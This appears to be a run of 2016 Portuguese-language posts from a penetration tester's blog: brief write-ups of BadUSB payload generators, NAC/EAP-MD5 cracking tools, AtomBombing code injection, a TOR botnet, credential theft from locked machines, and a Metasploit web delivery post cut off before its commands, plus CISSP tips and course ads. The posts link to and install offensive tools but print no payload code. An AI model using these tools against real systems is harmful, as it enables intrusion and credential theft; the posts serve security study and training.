Muitos dizem que tudo é mais fácil comRubberDucky porque a sintaxe para programar o USB é mais simples, mais fácil e mais rápido do que a programação com Arduino. Isso é verdade, mas hoje há uma ferramenta muito boa para isso, Brutal, uma ferramenta desenvolvida pelo grupo <a href="http://redirect.viglink.com/?format=go&jsonp=vglnk_148130712567811&key=172579b97fa4d5e8c1a3c2918a03e499&libId=iwi3oap201012xfz000DA6bwl1c0872bc&loc=http%3A%2F%2Fwww.hackplayers.com%2F2016%2F11%2Fbadusb-facil-y-sencillo.html&v=1&out=https%3A%2F%2Fgithub.com%2FScreetsec&title=BadUSB%2C%20f%C3%A1cil%20y%20sencillo%20%3A%20hackplayers&txt=%3Ci%3EScreetSec%3C%2Fi%3E" target="_blank">ScreetSec</a> (criadores de Thefatrat ou LALIN) e foi lançado há pouquíssimo tempo. Esta ferramenta possui vários módulos que nos fornecem código escritos para Arduino com várias funções, que nos fornecem um monte de coisas ao usar nosso Teensy como um BadUSB.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A ferramenta tem os seguintes módulos:</div>
<div style="text-align: justify;">
<div>
<ul>
<li>Gerar um payload que execute uma conexão reversa TCP através de PowerShell</li>
<li>Baixa e executa um backdoor</li>
<li>Obtém as credenciais graças ao Mimikatz</li>
<li>Gera payloads para dar uma zoada no alvo</li>
<li>Gera payloads para administração do Windows</li>
<li>Executa diversos outros ataques contra o Windows</li>
</ul>
</div>
<div>
<br /></div>
<div>
<div>
Instalação e execução da ferramenta:</div>
<div>
<ul>
<li>Instalar os pacotes de PaensyLib na biblioteca do Arduíno.</li>
<li>git clone https://github.com/Screetsec/Brutal.git</li>
<li>cd Brutal</li>
<li>chmod +x Brutal.sh</li>
<li>./Brutal.sh</li>
</ul>
</div>
<div>
<br /></div>
<div>
PoC do Brutal:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/WaqY-pQpuV0/0.jpg" src="https://www.youtube.com/embed/WaqY-pQpuV0?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div>
<div>
<br /></div>
</div>
</div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-574497926722616312016-11-09T12:53:00.001-02:002016-11-09T12:53:22.193-02:00Auto_EAP e EAPMD5PASS: boas ferramentas para burlar NACs<div style="text-align: justify;">
Quem já fez ou faz o curso de Pentest Avançado comigo, sabe que abordamos a fase de bypass de controles de acesso à redes, inclusive aquelas que utilizam NAC. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Muitas soluções para bloqueio de acesso à redes e autenticação, utilizam o protocolo EAP (Extensible Authentication Protocol) para redes wireless, através de diversas implementações, como WPA, WPA2 e IEEE 802.11. Para entender melhor esse protocolo, indico a leitura da <a href="https://tools.ietf.org/html/rfc5247" target="_blank">RFC 5247</a>, que é a atualização das obsoletas RFCs <a href="https://tools.ietf.org/html/rfc2284" target="_blank">2284</a> e <a href="https://tools.ietf.org/html/rfc3748" target="_blank">3748</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
O grande problema aqui, é que algumas soluções (se não a maioria), ainda utiliza a definição do EAP como designado na RFC 3748, que é o EAP MD5-challenge, cujo algoritmo é fraco e a metodologia de autenticação é falha, permitindo que através da captura de pacotes de rede, com o MD5-challenge, o atacante consiga, utilizando uma boa wordlist, prever a senha de autenticação ao gerar o mesmo hash a partir do challenge enviado + palavra de uma wordlist que deve ser igual ao hash capturado no pacote de rede.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
O que é mais interessante, é que isso pode ser feito até mesmo sem estar autenticado, pois o dispositivo obtém um acesso limitado na rede para poder se comunicar com o servidor RADIUS para troca de pacotes na tentativa de obtenção da autenticação. Nesse período, é possível capturar pacotes com os hashs necessários para descoberta da senha de autenticação.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
É importante, no entanto, atentar para diferentes cenários, pois em redes wireless isso é muito mais tranquilo, já que os pacotes trafegam em broadcast, mas em redes cabeadas você precisa de duas placas de rede em modo bridge para se conectar ao switch com uma delas e na outra, um dispositivo que seja autenticado na rede mas que se utilize de criptografia fraca ou nenhuma, como impressoras e VoIP phones.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Para facilitar nossas vidas, existem algumas ferramentas que podem nos auxiliar nesse processo. Duas delas merecem destaque em minha opinião, EAPMD5pass e Auto_EAP.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
O <a href="http://www.willhackforsushi.com/?page_id=67" target="_blank">EAPMD5pass</a> é um programa (precisa ser compilado) que permite, após a captura de pacotes utilizando tcpdump ou wireshark, por exemplo, tentar quebrar a senha dos pacotes enviados com o hash md5 do challenge + senha. Esse programa foi criado por um profissional conhecido e respeitado da área de segurança, chamado Johnny Long, e pode ser baixado a partir de seu site.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Já a segunda ferramenta, baseada em Python, <a href="https://github.com/Tylous/Auto_EAP" target="_blank">Auto_EAP</a>, se utiliza da biblioteca wpaspy para realizar ataques contra a autenticação de redes wireless, através de um daemon chamado wpa_daemon, para evitar o lock out de contas ativas. Para usar essa ferramenta, execute primeiro o script RunMeFirst.py. E o único problema que vejo nessa ferramenta, ainda é sua falta de suporte à wordlists para quebra de senha e o fato de não ser multi thread. Para quem sabe um pouco de Python, nada muito difícil de resolver, ou então esperar uma nova versão.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
É isso pessoal, divirtam-se!</div>
<div style="text-align: justify;">
<br /></div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-25549128903611330042016-10-28T15:18:00.003-02:002016-10-28T15:22:15.504-02:00Novo ataque contra Windows: AtomBombing<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Foi descoberta há alguns dias uma falha de implementação no Windows que permite um ataque remoto que possibilita realizar man-in-the-middle contra browsers, tirar screenshot da tela do alvo, e acessar senhas armazenadas no browser.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">É interessante dar uma lida na explicação da Microsoft em seu blog sobre o que são e como funcionam as Atom tables, que possibilitam essa exploração: </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms649053(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/windows/desktop/ms649053(v=vs.85).aspx</a></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">AtomBombing afeta todas as versões do Windows. E foi testada em particular contra o Windows 10, sendo totalmente eficaz.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Entretanto, uma grande questão que surgiu, foi: esse problema não pode ser corrigido por um patch, já que não depende de uma brecha ou falha no código, e sim sobre como esse sistema operacional foi desenhado e implementado.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">O mecanismo do Windows que o AtomBombing explora é chamado Atom tables. Essas tabelas são fornecidas pelo sistema operacional para permitir que aplicativos armazenem e acessem dados. Estas Atom tables também podem ser usadas para compartilhar dados entre aplicações.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">O que foi descoberto é que um código malicioso pode escrever em uma Atom table e forçar um programa legítimo a recuperar o código malicioso da mesma. E assim, o programa legítimo, agora contendo o código malicioso, pode ser manipulado para executar esse código.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Esse outro link explica bem como isso ocorre e como pode ser feito: </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://breakingmalware.com/injection-techniques/atombombing-brand-new-code-injection-for-windows/">https://breakingmalware.com/injection-techniques/atombombing-brand-new-code-injection-for-windows/</a></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Obviamente que tudo isso depende de realiza um code injection, mas uma simples engenharia social já possibilitaria realiza isso, pois esse código malicioso só conseguiria escrever nas Atom tables localmente. Para uma PoC, segue o link para um código que consegue fazer isso e injetar um shellcode a ser executado por um aplicativo válido e reconhecido: </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://github.com/BreakingMalwareResearch/atom-bombing">https://github.com/BreakingMalwareResearch/atom-bombing</a></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Divirtam-se!</span></div>
<div class="MsoNormal">
<o:p></o:p></div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-55254039490628442672016-10-27T16:10:00.001-02:002016-10-27T16:10:30.468-02:00ZIB - Botnet via TOR<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">O ZIB é conhecido como The Open TOR Botnet, sendo um projeto baseado em Python, que até alguns meses atrás ainda era completamente indetectável pelos antivírus, pois se utiliza de um padrão de encriptação e ofuscamento utilizado pelo DoD (Department of Defense) americano, que é alterado para cada novo deployment. Resumindo: para cada novo cliente gerado para a botnet, o tamanho e codificação do arquivo é diferente, nunca mantendo a mesma assinatura, por exemplo.</span></div>
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">Outro ponto, que pode ser percebido pelo nome do projeto, é que a comunicação é feita via TOR, para encriptar e evitar o rastreamento da fonte de controle dos bots, que são gerenciados através do IRC.</span></div>
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">Outras duas características desse bots, é que eles podem usar um sistema de autenticação para permitir que apenas usuários com credenciais possam acessá-los e comandá-los, seja toda a botnet, ou apenas uma parte da botnet; e a outra características, é o gerenciamento de pagamentos via BitCoin, através do qual o dono da botnet pode "alugar" seus hosts para outras pessoas.</span></div>
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">É bem importante frisar, como o próprio desenvolvedor da ferramenta colocou em seu github, que <b><span style="color: red;">essa ferramenta é para propósito de pesquisa</span></b>. Portanto, indico o uso dessa ferramenta para que possam entender o funcionamento de uma botnet, e criar labs onde sejam capazes de monitorar o funcionamento e fazer a forense de hosts infectados, como exercício de resposta a incidentes.</span></div>
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">Confesso que das versões gratuitas de botnets liberadas para pesquisa, essa foi uma das mais completas que encontrei até hoje.</span></div>
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;">Para entender as muitas características e funcionalidades, além de poder baixar os arquivos do ZIB, acessem o GitHub dos desenvolvedores através <a href="https://github.com/whitepacket/ZIB-Trojan" target="_blank">desse link</a>.</span></div>
<div style="text-align: justify;">
<br /></div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-63296851342877059632016-09-09T18:07:00.000-03:002016-09-09T18:07:50.822-03:00Enfim, CISSP!Hoje fiz minha prova de CISSP, primeira e única tentativa.<br />
<br />
Há algumas semanas atrás agendei minha prova para o dia 26 de Outubro/2016, mas anteontem recebi um email da Pearson Vue dizendo que o centro de exames credenciado pela ISC2 aqui no Rio de Janeiro (Allen) não poderia aplicar a prova no dia agendado, e que precisaria remarcar. Qual não foi minha surpresa ao ver que as únicas datas disponíveis seriam dias 08 ou 09 de Setembro (hoje). Caso não quisesse remarcar para esses dias, tinha duas opções: solicitar o reembolso e desistir da prova, ou ir à outro estado para fazer a prova.<br />
<br />
Como estava contando com as duas primeiras semanas de Outubro para estudar, durante minhas férias, não me sentia preparado para a prova, pois só havia lido o livro "CISSP 11th Hour, 2nd Edition". Mas um grande amigo meu (valeu Matuck!), me deu força para reagendar a prova para hoje mesmo, já que meu atual empregador estava pagando minha prova passando ou não no exame.<br />
<br />
Bem, depois de desfiar esse terço e contar minha história triste, é hora de contar um pouco de minha estratégia para a prova. Usei basicamente quatro fontes de estudo para me preparar o pouco que foi possível. Foram elas, de acordo com o período:<br />
<br />
- <b>nos últimos dois meses</b>: lia o livro "CISSP 11th Hour, 2nd Edition" de Eric Conrad, sempre no metrô, usando o Kindle no celular, durante o trajeto de casa para o trabalho e do trabalho para casa. Isso permitiu que eu conseguisse ler o livro inteiro uma única vez, já que é um livro resumido de pouco mais de 200 páginas.<br />
- <b>durante um mês antes dos Jogos Olímpicos</b>: estudava cerca de 20 questões de simulados por dia usando questões de exemplos que encontrava em livros e materiais encontrados na internet. Precisei parar com isso durante as Olimpíadas, por conta de meu horário de trabalho com escalas de 12h virando a noite.<br />
- <b>ontem à noite, durante 2h</b>: entrei no <a href="http://www.cybrary.it/">www.cybrary.it</a> e baixei apenas os slides do curso de CISSP. Não tinha tempo para assistir os vídeos, então só li os pouco mais de 580 slides, onde todos os domínios estavam resumidos. Ajudou muito, por sinal, e ainda é gratuito!<br />
- <b>ontem à noite, durante 2h</b>: como último recurso, um amigo mandou para mim um material de 11 páginas com um resumo muito bem construído do conteúdo abordado pela prova. Caso tenham interesse, podem baixar <a href="https://cccure.training/m/articles/download/192/80" target="_blank">por esse link</a>! Posso dizer que é o resumo total do que li no CISSP 11th Hour e nos slides da Cybrary, e pode ajudar muito para relembrar conteúdos antes da prova.<br />
<br />
Essa foi minha estratégia e, como escrevi acima, permitiu que na primeira vez eu conseguisse passar na prova.<br />
<br />
Obviamente não vou negar que os 20 anos de atuação na área de TI (comecei a trabalhar com 17 anos com TI de carteira assinada), e dentro desses 20 anos, os 15 de experiência com segurança da informação, me ajudaram muito, pois essa vivência fez com que eu só precisasse relembrar conceitos, ao invés de precisar aprender algo do zero. Posso citar alguns exemplos:<br />
<br />
- criptografia: fiz há 3 anos atrás a prova de GXPN, que tem conceitos de criptografia bem mais aprofundados que o CISSP, então esse conteúdo foi tranquilo;<br />
- domínio de segurança em SDLC: sou líder de um capítulo da OWASP desde 2012, e já dei treinamento para 12 turmas dentro de uma grande multinacional sobre segurança em SDLC;<br />
- segurança em redes: atuando como gerente de segurança, colocando a mão na massa e ainda fazendo pentest, isso facilitou muito;<br />
- BCP e DR: vivenciei isso na prática em grandes projetos, incluindo nos Jogos Olímpicos;<br />
- security assessment: como pentester há mais de 10 anos, esse conteúdo foi bem tranquilo;<br />
- gestão de segurança, governança, e compliance: também com experiência no desenvolvimento e auditoria de políticas e controles de segurança, o conteúdo foi bem tranquilo.<br />
<br />
Agora, algumas dicas podem ajudar muito, já que o segredo da prova é entender como a ISC2 pensou ao desenvolver as questões:<br />
- trabalhe com eliminação, pois sempre há mais de uma questão correta, então leia bem o enunciado e preste atenção em pegadinhas, tentando entender qual é a resposta MAIS correta que as outras;<br />
- você precisa fazer a prova com a visão de um Analista de Riscos;<br />
- na dúvida, a segurança física é sempre a melhor opção, pois é a primeira camada da segurança em profundidade;<br />
- sempre aplique o conceito de segurança em camadas (produndidade);<br />
- a segurança das pessoas sempre vem em primeiro lugar, SEMPRE!<br />
<br />
Com essas dicas em mente, faça tantos simulados quanto forem possíveis, pois assim entenderá o mindset da ISC2, e então é só agendar a prova, que por enquanto não tem mais local para fazer no RJ. Quem quiser, precisará ir para São Paulo, Belo Horizonte, Curitiba ou Brasília.<br />
<br />
E por último, como todo o material que estudei estava em inglês, optei por fazer a prova nesse idioma, para não correr o risco de confundir termos.<br />
<br />
De 6h que poderia utilizar, finalizei a prova em metade do tempo permitido, não fazendo nenhum break, pois fiquei focado em não perder tempo ou a linha de raciocínio. Mas o mais chato para mim, foi não receber o resultado logo quando enviei as questões respondidas; ainda precisei ir até a recepção e aguardar a impressão do resultado....rs. Longos minutos de tensão...<br />
<br />
Bem, é isso aí! Espero que as dicas ajudem, e que algum de vocês possa aproveitá-las para passar pelo exame com sucesso.Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com7tag:blogger.com,1999:blog-3466062841868611806.post-22215356904977957702016-09-07T12:27:00.001-03:002016-09-07T12:27:06.009-03:00Roubando credenciais de usuários Windows e MACÉ um ataque bem interessante esse descoberto pelo @mubix, e é bem útil emsituações onde o usuário bloqueou a máquina, mas deixou seu usuário logado. O mais interessante é que foi testado e funciona contra todas as versões de Windows e MAC.<br />
<br />
Abaixo é possível ver o vídeo do teste com sucesso:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/Oplubg5q7ao/0.jpg" src="https://www.youtube.com/embed/Oplubg5q7ao?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div>
<br />
<br />
O equipamento utilizado pode ser construído por vocês, ou pode-se usar o <a href="http://hakshop.myshopify.com/products/lan-turtle" target="_blank">HAK5 LAN Turtle</a>, vendido pela HAK5.<br />
<br />
A lógica do ataque é razoavelmente simples e só precisa de três coisas: um dispositivo USB Ethernet + DHCP + Responder, e com isso conseguimos capturar as credenciais de um computador que esteja com sua tela de login bloqueada, porém com um usuário logado.<br />
<br />
<a href="https://room362.com/post/2016/snagging-creds-from-locked-machines/" target="_blank">Nesse link</a> tem toda a informação necessária para entender o ataque, criar seu próprio USB Armory pronto para o ataque, ou como configurar o HAK5 LAN Turtle que já vem quase pronto para o ataque.<br />
<br />
Divirtam-se!<br />
<br />
<br />Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-38823066761430119622016-06-22T09:24:00.000-03:002016-09-01T20:46:19.455-03:00Curso Pentest Avançado e Introdução à Exploração de Softwares - EAD - Out/2016<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Mesmo curso ministrado para a divisão de Defesa Cibernética do Exército!</b></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Curso que alia prática e teoria, abordando técnicas avançadas de exploração de sistemas, redes e protocolos vulneráveis. Com esse conteúdo, o aluno será capaz de sair do básico de teste de invasão e partir para um outro nível, com técnicas de exploração mais avançadas e conhecimento necessário para descobrir vulnerabilidades em aplicações e criar seus próprios exploits.</span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="background-color: white; color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">O curso abordará técnicas de exploração tanto de Windows quanto Linux, e cobrirá os tópicos abaixo, de uma forma macro:</span></div>
<div style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; line-height: 18px;"><br /></span></span></div>
<div style="text-align: justify;">
</div>
<ul>
<li><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif;"><span style="line-height: 18px;"><b>Explorando Redes - </b></span></span><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">Onde o aluno aprenderá como burlar os controles de acesso de uma rede, bem como explorar vulnerabilidades comuns em redes modernas e seus protocolos.</span></li>
<li><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif;"><span style="line-height: 18px;"><b>Manipulando a Rede - </b></span></span><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">O aluno será capaz de entender como manipular sistemas de rede para ganhar acesso privilegiado e a oportunidade de explorar sistemas dentro das mesmas.</span></li>
<li><b style="color: #333333; font-family: arial, helvetica, sans-serif; line-height: 18px;">Burlando Ambientes Restritos - </b><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">Serão demonstrados ambientes em Linux e Windows, com restrições de Desktop, e as ferramentas e técnicas para burlar tais restrições.</span></li>
<li><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;"><b>Softwares Maliciosos e Bypass de Antivírus</b> - O aluno aprenderá como injetar rotinas maliciosas em binários funcionais, e controlar o fluxo de execução de seu código. Verá na prática também, como burlar antivírus, controlando o fluxo de binários maliciosos, alterando assinatura, usando técnicas de anti-debugging e criptografia.</span></li>
<li><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif;"><span style="line-height: 18px;"><b>Introdução às Técnicas de Fuzzing - </b></span></span><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">O aluno aprenderá como funciona de forma prática, bem como os benefícios, as técnicas de protocol fuzzing para identificar falhas em sistemas alvo.</span></li>
<li><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif;"><span style="line-height: 18px;"><b>Técnicas Avançadas de Fuzzing - </b></span></span><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">O aluno será capaz de criar sequências de testes customizados utilizando o framework Sulley.</span></li>
<li><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;"><b>Introdução à Exploração de Sistemas Windows - </b></span><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">O aluno entenderá os conceitos básicos de Windows para explorar as falhas comuns desse sistema e os </span><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">Compile-Time Controls.</span></li>
<li><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;"><b>Windows Overflows - </b></span><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">O aluno aprenderá como explorar vulnerabilidades no Windows a partir da stack, e burlar proteções de memória.</span></li>
<li><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;"><b>Introdução à Memória Dinâmica do Linux - </b></span><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">O aluno aprenderá um pouco sobre arquitetura de processadores X86, gerenciamento de memória no Linux, assembly, linkedição e carregamento de processos.</span></li>
<li><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;"><b>Smashing the Stack - </b></span><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">Será ensinado ao aluno como escrever exploits básicos para stack overflow e também contra programa protegidos com canary e ASLR.</span></li>
</ul>
<br />
<div style="text-align: justify;">
<span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;">O aluno montará seus próprios LABs com orientação do instrutor, e poderá utilizar sua infraestrutura para realizar os testes durante a aula, e posteriormente ao assistir os vídeos gravados das aulas.</span><br />
<span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;"><br /></span><span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;"><b>Máquinas virtuais necessárias:</b> Kali Linux, Windows 7 e outras que serão disponibilizadas pelo instrutor ao início do curso. As máquinas podem ser virtualizadas utilizando VMWare ou VirtualBox.</span></div>
<div style="text-align: justify;">
<span style="color: #333333; font-family: "arial" , "helvetica" , sans-serif; line-height: 18px;"><br /></span></div>
<div style="text-align: justify;">
<span style="background-color: white; color: #333333; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; line-height: 18px;">Quem tiver interesse no curso, por favor, acesse o link </span><b style="background-color: white; color: #333333; font-family: arial, helvetica, sans-serif; line-height: 18px;"><u><a href="http://bit.ly/ZkbwEE" style="color: black; text-decoration: initial;">http://bit.ly/ZkbwEE</a></u></b><span style="background-color: white; color: #333333; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; line-height: 18px;"> e faça sua inscrição no curso "Pentest Avançado e Introdução a Exploração de Softwares". Para pagamentos via Paypal ou PagSeguro, após preencher o formulário, aguarde o e-mail com o link de cobrança.</span><br />
<b style="background-color: white; color: #333333; font-family: arial, tahoma, helvetica, freesans, sans-serif; line-height: 18px;"><br /></b><span style="background-color: white; color: #333333; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; line-height: 18px;"></span><b style="background-color: white; color: #333333; font-family: arial, tahoma, helvetica, freesans, sans-serif; line-height: 18px;">Carga horária: 40h</b><br />
<b style="background-color: white; color: #333333; font-family: arial, tahoma, helvetica, freesans, sans-serif; line-height: 18px;">Investimento:</b><span style="background-color: white; color: #333333; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; line-height: 18px;"> <b>R$ 981,00 à vista</b> (ou 1.090,00 com possibilidade de parcelamento em até 3x no cartão de crédito via PayPal ou 12x via BCash)</span><br />
<b style="background-color: white; color: #333333; font-family: arial, tahoma, helvetica, freesans, sans-serif; line-height: 18px;">Horário de aula: </b><span style="background-color: white; color: #333333; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; line-height: 18px;">22h às 24h</span><br />
<b style="background-color: white; color: #333333; font-family: arial, tahoma, helvetica, freesans, sans-serif; line-height: 18px;">Dias de aula: </b><span style="background-color: white; color: #333333; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; line-height: 18px;">ter., e qua.</span><br />
<b style="background-color: white; color: #333333; font-family: arial, tahoma, helvetica, freesans, sans-serif; line-height: 18px;">Início das aulas: </b><span style="background-color: white; color: #333333; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; line-height: 18px;">25</span><span style="background-color: white; color: #333333; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; line-height: 18px;">/10/2016</span><br />
<b style="background-color: white; color: #333333; font-family: arial, tahoma, helvetica, freesans, sans-serif; line-height: 18px;">Local: </b><span style="background-color: white; color: #333333; font-family: "arial" , "tahoma" , "helvetica" , "freesans" , sans-serif; line-height: 18px;">Internet</span></div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com8tag:blogger.com,1999:blog-3466062841868611806.post-77961226882441816152016-05-20T20:48:00.004-03:002016-09-29T17:14:40.153-03:00Venda de cursos já realizados<div style="text-align: justify;">
Pessoal, sei que muita gente as vezes acaba perdendo uma turma ou outra dos cursos que realizo, seja por falta de tempo, ou dinheiro, naquele momento em que estou formando as turmas. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Por conta disso é possível adquirir, após a realização das turmas, o material de cada uma delas. No material sempre estão inclusos os slides, os vídeos e os arquivos utilizados em cada curso, e em alguns inclusive disponibilizo a apostila e máquinas virtuais para os laboratórios (esses dois últimos, nem todos os cursos tem, mas todos tem os vídeos e slides).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Quando o aluno adquire o material do curso, é possível ao final de seus estudos realizar uma avaliação prática para receber o certificado de conclusão do mesmo, caso o aluno tenha interesse.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Os cursos atualmente disponíveis para aquisição são os seguintes, com seus respectivos valores a serem pagos via Paypal em até 3x:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
- Hardening de Servidores Linux = 450,00</div>
<div style="text-align: justify;">
- Pentest em Redes = 710,00</div>
<div style="text-align: justify;">
- Engenharia Social = 400,00</div>
<div style="text-align: justify;">
- Pentest em Aplicações WEB = 640,00</div>
<div style="text-align: justify;">
- Perícia Forense Digital = 710,00</div>
<div style="text-align: justify;">
- Fundamentos de Programação com Assembly e C = 450,00</div>
<div style="text-align: justify;">
- Engenharia Reversa e Análise de Malwares = 800,00</div>
<div style="text-align: justify;">
- Pentest Avançado e Introdução à Exploração de Softwares = 800,00</div>
<div style="text-align: justify;">
- Programação para Pentesters = 800,00</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Para pagamentos à vista, é possível um desconto de 5%. E caso adquira mais de um curso, podemos negociar outros descontos.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Quem tiver interesse, basta enviar um e-mail para luizwt at gmail.com.</div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-55605433003532434682016-05-16T12:25:00.003-03:002016-05-16T12:25:28.229-03:00Módulo Web Delivery do Metasploit<span style="text-align: justify;">Muitas vezes estamos em situações em que temos acesso à uma máquina que precisamos explorar, mas sem as ferramentas adequadas ou necessárias naquele momento. Um dos módulos do Metasploit que pode nos ajudar em cenários assim é o web delivery, que permite que remotamente nos conectemos à um IP e tenhamos de retorno um shell, seja command.com ou meterpreter no caso do Metasploit.</span><br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Entretanto, é necessário que deixemos nossa máquina com o Metasploit (possivelmente na nuvem) já configurada aguardando a conexão.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Nesse exemplo, vamos ver como compromenter uma máquina Windows, entregando um shell meterpreter via PowerShell (poderia ser via Python ou PHP também).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
